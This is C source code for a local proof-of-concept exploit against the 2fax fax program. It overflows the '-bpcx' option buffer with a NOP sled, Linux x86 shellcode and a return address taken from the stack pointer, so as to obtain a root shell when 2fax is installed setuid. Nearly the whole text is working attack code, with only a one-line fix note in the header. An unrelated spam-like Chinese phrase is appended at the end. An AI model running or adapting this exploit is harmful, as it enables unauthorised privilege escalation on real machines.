/******************************************************************************* * * * 2fax local PoC exploit * * by Crazy Einstein [crazy_einstein@yahoo.com], Limpid Byte [lbyte.void.ru] * * * * Bug: Buffer Overflow in -bpcx option * * Homepage of 2fax: http://www.atbas.org/ * * * * Solution: Don't set suid bit to 2fax program * * * *******************************************************************************/ #include #include #define MAX_SIZE 350 #define OFFSET -1100 #define tmpfile "/tmp/abcde0987654" /* shellcode for Linux x86 by Grange */ char shellcode[]= "\x31\xc0\x31\xdb\xb0\x17\xcd\x80" "\xb0\x2e\xcd\x80\xeb\x15\x5b\x31" "\xc0\x88\x43\x07\x89\x5b\x08\x89" "\x43\x0c\x8d\x4b\x08\x31\xd2\xb0" "\x0b\xcd\x80\xe8\xe6\xff\xff\xff" "/bin/sh"; long getesp() { __asm__("movl %esp,%eax"); } void usage(int argc, char **argv) { printf("Local exploit for 2fax program (<= v2.02)\n by Crazy Einstein [crazy_einstein@yahoo.com], Limpid Byte [lbyte.void.ru]\n\n" "Usage: %s [offset]\n\n",argv[0]); return; } int main(int argc,char **argv) { char buf[MAX_SIZE], buf2[MAX_SIZE + 20], faxpath[100], *p, tmpexec[200]; int offset = OFFSET; long ret; if(argc<2) { usage(argc,argv); exit(-1); } strcpy(faxpath,argv[1]); if(argv[2]) offset=atoi(argv[2]); bzero(buf,sizeof(buf)); bzero(buf2,sizeof(buf2)); ret=getesp()-offset; printf("ret: 0x%x, offset: %d\n",ret,offset); memset(buf,0x90,312-strlen(shellcode)); strcat(buf,shellcode); strcat(buf,"AAAAAAAAAAAAAAAA"); while( (p=(char *)strstr(buf,"AAAA")) != NULL ) *(long*)p=ret; sprintf(buf2,"-bpcx:%s",buf); sprintf(tmpexec,"touch %s;rm -rf %s",tmpfile,tmpfile); system(tmpexec); execl(faxpath,faxpath,buf2,tmpfile,tmpfile,NULL); return 0; }

亚洲欧美在线